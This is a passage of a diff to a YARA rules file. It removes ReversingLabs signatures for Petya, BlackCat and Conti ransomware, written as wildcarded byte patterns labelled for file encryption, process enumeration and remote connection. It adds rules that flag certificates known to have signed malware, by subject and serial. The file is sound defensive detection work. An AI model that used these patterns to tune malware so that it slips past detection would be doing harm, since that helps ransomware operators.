-            ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 09 72 ?? ?? ?? ??
-            6F ?? ?? ?? ?? 2D ?? 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 09 72 ?? ?? ?? ?? 6F ?? ??
-            ?? ?? 2D ?? 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 02 02 7B ?? ?? ?? ?? 09 72 ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 09 28 ?? ?? ?? ?? 26 08 17 58 0C 08 07 8E 69 3F ??
-            ?? ?? ?? 02 7B ?? ?? ?? ?? 06 17 6F ?? ?? ?? ?? 2A
-        }
-		$encrypt_folder_p1 = {
-            1F ?? 8D ?? ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 72 ?? ?? ??
-            ?? A2 25 19 72 ?? ?? ?? ?? A2 25 1A 72 ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 25 1C 72
-            ?? ?? ?? ?? A2 25 1D 72 ?? ?? ?? ?? A2 25 1E 72 ?? ?? ?? ?? A2 25 1F ?? 72 ?? ?? ?? ??
-            A2 25 1F ?? 72 ?? ?? ?? ?? A2 25 1F ?? 72
-        }
-		$encrypt_folder_p2 = {
-            A2 0A 03 28 ?? ?? ?? ?? 0B 03 28 ?? ?? ?? ?? 0C 16 0D 2B ?? 07 09 9A 28 ?? ?? ?? ?? 13
-            ?? 06 11 ?? 28 ?? ?? ?? ?? 2C ?? 02 07 09 9A 04 28 ?? ?? ?? ?? 09 17 58 0D 09 07 8E 69
-            32 ?? 16 13 ?? 2B ?? 02 08 11 ?? 9A 04 28 ?? ?? ?? ?? 11 ?? 17 58 13 ?? 11 ?? 08 8E 69
-            32 ?? 2A
-        }
-		$deep_search_p1 = {
-            17 8D ?? ?? ?? ?? 0A 06 16 72 ?? ?? ?? ?? A2 7E ?? ?? ?? ?? 0B 02 0C 16 0D 38 ?? ?? ??
-            ?? 08 09 9A 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 72
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ??
-            ?? ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 11 ?? 72
-        }
-		$deep_search_p2 = {
-            6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 07 11 ?? 72 ?? ?? ?? ?? 28
-            ?? ?? ?? ?? 0B 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 09 17 58 0D 09 08 8E
-            69 3F ?? ?? ?? ?? 07 06 17 6F ?? ?? ?? ?? 2A
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "3a:94:9e:f0:3d:9d:d2:d1:50:b2:4b:27:4f:f6:d7:b4" and 1474156800 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_954D0577D5Ce8999E0387A5364829F66 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "70e770dd-95fd-5273-b6ee-9bb5eea30e3b"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15386-L15404"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "84ddc08a0a55200f644778a0e3482f15e82d74c524f12a7ad91b1c3d4acfc731"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enum_folders ) and ( all of ( $deep_search_p* ) ) and ( all of ( $encrypt_folder_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Soblosol Limited" and ( pe.signatures [ i ] . serial == "00:95:4d:05:77:d5:ce:89:99:e0:38:7a:53:64:82:9f:66" or pe.signatures [ i ] . serial == "95:4d:05:77:d5:ce:89:99:e0:38:7a:53:64:82:9f:66" ) and 1543968000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Win32_Ransomware_Petya : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Cert_Blocklist_Df5121Dc99D1Ab6B7E5229F6832123Ef : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Petya ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "93d9fb33-88d1-50ec-bf99-1888201c0ec2"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "8dfc50be-7316-5a52-937b-4551aa642b7e"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Petya.yara#L3-L58"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15406-L15424"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d2adafcb21b627d614eab79e64e2b96ad09fae796d0670452a19490d8781ce99"
+		logic_hash = "3b5e5b81890f1dea3dc0858cade54e7f88a21861818be79c3e7fba066f80d491"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Petya"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$entry_point = {
-            55 8B EC 56 8B 75 ?? 57 83 FE ?? 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 56 FF 75 ?? E8 ?? ?? ?? ?? 8B F8 85 F6 75 ?? E8 ??
-            ?? ?? ?? 8B C7 5F 5E 5D C2
-        }
-		$shutdown_pattern = {
-            55 8B EC 83 EC ?? 8D 45 ?? 56 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0
-            75 ?? 33 C0 EB ?? 8D 45 ?? 33 F6 50 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 56 56 56 8D
-            45 ?? C7 45 ?? ?? ?? ?? ?? 50 56 FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 FF 15
-            ?? ?? ?? ?? 8D 4D ?? 51 6A ?? 56 56 56 68 ?? ?? ?? ?? FF D0 33 C0 83 C4 ?? 40 5E 8B
-            E5 5D C3
-        }
-		$sectionxxxx_pattern = {
-            83 EC ?? 53 55 8B C2 89 4C 24 ?? 56 57 8B C8 89 44 24 ?? 33 D2 E8 ?? ?? ?? ?? 85 C0
-            74 ?? 0F B7 48 ?? 8B FA 83 C1 ?? 03 C8 0F B7 40 ?? 89 44 24 ?? 85 C0 74 ?? BE ?? ??
-            ?? ?? 2B F1 80 39 ?? 8D 59 ?? 6A ?? 5D 75 ?? 85 ED 74 ?? 0F BE 2C 1E 0F BE 03 43 3B
-            E8 74 ?? 83 C1 ?? 83 EE ?? 47 3B 7C 24 ?? 72 ?? 8B CA 85 C9 74 ?? 8B 51 ?? 8B 5C 24
-            ?? 8B FB 03 54 24 ?? 8B F2 8B 4A ?? A5 83 C1 ?? 03 CA 89 4B ?? A5 A5 8B 43 ?? 8D 72
-            ?? 89 43 ?? 8B 43 ?? 89 43 ?? B8 ?? ?? ?? ?? 89 73 ?? 66 39 01 74 ?? 8B 7A ?? 8B 2A
-            03 7A ?? 74 ?? 33 DB 43 2B DE 33 D2 8D 0C 33 8B C5 F7 F1 30 16 46 4F 75 ?? B2 ?? 5F
-            5E 5D 0F B6 C2 5B 83 C4 ?? C3
-        }
-		$crypt_gen_pattern = {
-            55 8B EC 53 57 8B 7D ?? 8D 45 ?? 68 ?? ?? ?? ?? 6A ?? 33 DB 53 53 50 89 1F FF 15 ??
-            ?? ?? ?? 85 C0 75 ?? 6A ?? 58 EB ?? 56 FF 75 ?? 8B 75 ?? 56 FF 75 ?? FF 15 ?? ?? ??
-            ?? 85 C0 75 ?? 6A ?? 58 EB ?? 53 FF 75 ?? FF 15 ?? ?? ?? ?? 89 37 33 C0 5E 5F 5B 5D
-            C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "INC SALYUT" and ( pe.signatures [ i ] . serial == "00:df:51:21:dc:99:d1:ab:6b:7e:52:29:f6:83:21:23:ef" or pe.signatures [ i ] . serial == "df:51:21:dc:99:d1:ab:6b:7e:52:29:f6:83:21:23:ef" ) and 1613433600 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_760Cef386B63406751Ae83A9Eae92342 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "c2cbd1fd-ef68-5128-9c45-88b73a49130f"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15426-L15442"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "43b56736afe081a1215db67b933413d7fbafbfc1be8213b330668578921ebca7"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $entry_point at pe.entry_point ) and $shutdown_pattern and $sectionxxxx_pattern and $crypt_gen_pattern
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Gidrokon LLC" and pe.signatures [ i ] . serial == "76:0c:ef:38:6b:63:40:67:51:ae:83:a9:ea:e9:23:42" and 1601942400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Blackcat : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_5C2625Fa836A64F4882C56Cc7A45F0Ed : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects BlackCat ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e623340d-8df8-5f13-b75f-379bd0038f64"
-		date = "2022-02-14"
-		modified = "2022-02-14"
+		id = "db968865-fb1e-57b5-8968-6510e83c02ac"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.BlackCat.yara#L1-L109"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15444-L15460"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "24932baa625aedd14b5776ba3209c9ee330e84538c5267eeb5e09e352f655835"
+		logic_hash = "85e187684d62c33ef6f69323b837ef2d44facab8278b512d7bd6afd49eaed976"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "BlackCat"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_connection_p1 = {
-            8B 44 24 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? A1 ??
-            ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24
-            ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ??
-            ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 83 F8 ?? A1 ?? ?? ?? ?? 0F 45 C1 8B 0D ?? ??
-            ?? ?? 0F 45 CA 8D 54 24 ?? 89 94 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7
-            84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ??
-            ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84
-            24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ??
-            ?? ?? ?? 56 51 FF 50 ?? 83 C4 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 56 68 ?? ?? ?? ??
-            FF 74 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ??
-            ?? ?? 6A ?? 56 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75
-            ?? E8 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 56 68 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? 85
-        }
-		$remote_connection_p2 = {
-            C0 89 44 24 ?? 0F 88 ?? ?? ?? ?? 8B 8B ?? ?? ?? ?? 74 ?? A1 ?? ?? ?? ?? 89 CB 85 C0
-            75 ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 74 24 ?? 6A ?? 50 E8
-            ?? ?? ?? ?? 85 C0 89 D9 75 ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8B 5C 24 ?? 89 44 24 ??
-            53 51 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 89 F1 8D 54 24 ?? 89 44 24 ?? 89 5C 24
-            ?? 89 5C 24 ?? C6 44 24 ?? ?? E8 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
-            ?? 8B 84 24 ?? ?? ?? ?? 8B 9C 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ??
-            ?? ?? ?? 3D ?? ?? ?? ?? 0F 43 C1 6A ?? 50 53 FF 74 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 89
-            44 24 ?? 75 ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 74 ?? 53 6A ?? FF 35 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 83 7C 24 ?? ?? 74 ?? FF 74 24 ?? 6A ?? FF 35 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 8B 5C 24 ?? 0F 84 ?? ?? ?? ?? 80 BB ?? ?? ?? ??
-            ?? 0F 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB
-        }
-		$enum_procs = {
-            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 39 F7 74 ??
-            69 C7 ?? ?? ?? ?? 89 4D ?? 01 C8 68 ?? ?? ?? ?? 89 DE 53 50 E8 ?? ?? ?? ?? 83 C4 ??
-            47 8D 85 ?? ?? ?? ?? 89 7D ?? 50 8B 5D ?? 53 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 89
-            F3 89 C6 EB ?? 8D 4D ?? 89 F2 E8 ?? ?? ?? ?? 8B 4D ?? 8B 7D ?? EB ?? 31 FF 8B 75 ??
-            85 FF 75 ?? E9 ?? ?? ?? ?? 31 FF 53 E8 ?? ?? ?? ?? 8B 75 ?? 85 FF 0F 84 ?? ?? ?? ??
-            83 7D ?? ?? 0F 84 ?? ?? ?? ?? 69 C7 ?? ?? ?? ?? 8B 4D ?? 8D BD ?? ?? ?? ?? 01 F0 89
-            45 ?? 8B 45 ?? 8D 04 40 8D 04 81 89 45 ?? EB
-        }
-		$find_files = {
-            57 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 53 56 E8 ?? ?? ??
-            ?? 83 F8 ?? 89 45 ?? 0F 84 ?? ?? ?? ?? 89 75 ?? A1 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ??
-            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? A3 ?? ?? ?? ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 85 C0 0F
-            84 ?? ?? ?? ?? 89 C6 8B 45 ?? 8B 4D ?? 89 46 ?? 8B 45 ?? 89 46 ?? 8B 45 ?? 89 46 ??
-            8D 41 ?? C7 06 ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 89 CB 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 8B 45 ?? 89 43 ?? 89 73 ?? 8B 75 ?? 31 C0 C7 43 ?? ?? ?? ?? ?? F7 45
-            ?? ?? ?? ?? ?? 89 03 75 ?? 83 7D ?? ?? 74 ?? 57 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 7D ?? ?? 75 ?? 83 7D ?? ?? 74 ?? 83 7D ?? ?? 74 ?? FF 75 ?? 6A ?? FF 35 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 5E 5F 5B 5D C3
-        }
-		$encrypt_files_p1 = {
-            B8 ?? ?? ?? ?? 8D 4D ?? 8D 95 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 7D ?? 8B 75
-            ?? 8D 4D ?? 89 FA 56 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 75 ?? 8B 45 ?? 8B 5D ?? 89
-            45 ?? 8B 45 ?? 83 F8 ?? 72 ?? 85 DB 74 ?? 0F B7 0B 81 F9 ?? ?? ?? ?? 75 ?? 8B 4B ??
-            89 C2 29 CA 72 ?? 83 FA ?? 72 ?? 85 DB 74 ?? 81 3C 0B ?? ?? ?? ?? 75 ?? 0F B7 54 0B
-            ?? 81 FA ?? ?? ?? ?? 75 ?? 0F B7 54 0B ?? 83 EA ?? 89 55 ?? BA ?? ?? ?? ?? 19 D2 89
-            55 ?? 72 ?? 83 F9 ?? 76
-        }
-		$encrypt_files_p2 = {
-            53 E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 5D ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 57
-            6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 51 ?? 29 D0 8B 55 ?? 0F 92
-            45 ?? 83 7D ?? ?? 75 ?? 80 7D ?? ?? 75 ?? 39 C2 77 ?? B8 ?? ?? ?? ?? F7 64 0B ?? 8B
-            55 ?? 70 ?? 39 C2 72 ?? 8B 44 0B ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 45 ?? 8B 85 ??
-            ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ??
-            89 45 ?? 89 10 89 48 ?? 8B 45 ?? 89 45 ?? 53 E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ??
-            8B 45 ?? 8B 4D ?? 29 45 ?? 3B 4D ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? E8 ?? ?? ??
-            ?? 8B 45 ?? 8B 4D ?? 89 45 ?? 89 4D ?? E9 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8B 35 ?? ??
-            ?? ?? 8B 45 ?? F2 0F 10 45 ?? 85 F6 89 85 ?? ?? ?? ?? F2 0F 11 85 ?? ?? ?? ?? 0F 84
-            ?? ?? ?? ?? A1 ?? ?? ?? ?? 85 C0 74 ?? 8D 0C C0 8D 3C 49 01 C7 01 F7 EB
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "5c:26:25:fa:83:6a:64:f4:88:2c:56:cc:7a:45:f0:ed" and 1474416000 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_7Df6Fa580F84493C414Ee0E431086737 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "27afa64e-0c9e-58ca-a4e1-db97cde66427"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15462-L15478"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "ef244587c9eb1e1cb2f8a9c161e5dd9ff70e9764586f16e011334400ee400ed9"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enum_procs ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "7d:f6:fa:58:0f:84:49:3c:41:4e:e0:e4:31:08:67:37" and 1477440000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Conti : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_309D2E115F1Fe2993Ee2E063 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Conti ransomware."
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "7182f3f2-7b2a-5c29-b7a9-607feafbe570"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15480-L15496"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "15fdb95fe5429cdc0263615c2b7c90d21f37b52954c5ce568c1293cd3a544730"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "30:9d:2e:11:5f:1f:e2:99:3e:e2:e0:63" and 1467102525 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_90E33C1068F54913315B6Ce9311141B9 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "61c5d5ed-ca2c-5f71-893b-4c933b37fa27"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15498-L15516"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "4a97171c6dfaa8d249ab0be1ce264b596d266ff4697d869a4d1f90cc0e2c49b7"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GERMES, OOO" and ( pe.signatures [ i ] . serial == "00:90:e3:3c:10:68:f5:49:13:31:5b:6c:e9:31:11:41:b9" or pe.signatures [ i ] . serial == "90:e3:3c:10:68:f5:49:13:31:5b:6c:e9:31:11:41:b9" ) and 1487635200 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_3F15C3 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "10bee456-21c0-51a0-988b-43daf65e596b"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15518-L15534"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "03ea946fa99ed7a6ab23cb26dbf514b6c062d63371c9e2a5ddf999acd1954955"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Certified Software" and pe.signatures [ i ] . serial == "3f:15:c3" and 1110577130 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_285Eccbd1D0000E640B84307Ef88Cd9F : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "4dc1523f-edc8-52e2-99aa-7389c0eb5e54"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15536-L15552"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "267df1c327b65938b2b82a53ec8345290659560c69c9a70f2866fe7bd73513a7"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
+
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DRAGON BUSINESS EQUIPMENT LIMITED" and pe.signatures [ i ] . serial == "28:5e:cc:bd:1d:00:00:e6:40:b8:43:07:ef:88:cd:9f" and 1611619200 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_55Ab71A3F9Dde3Ef20C788Dd1D5Ff6C3 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "c8b5b632-26e6-5a78-99be-b50b1240dbec"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
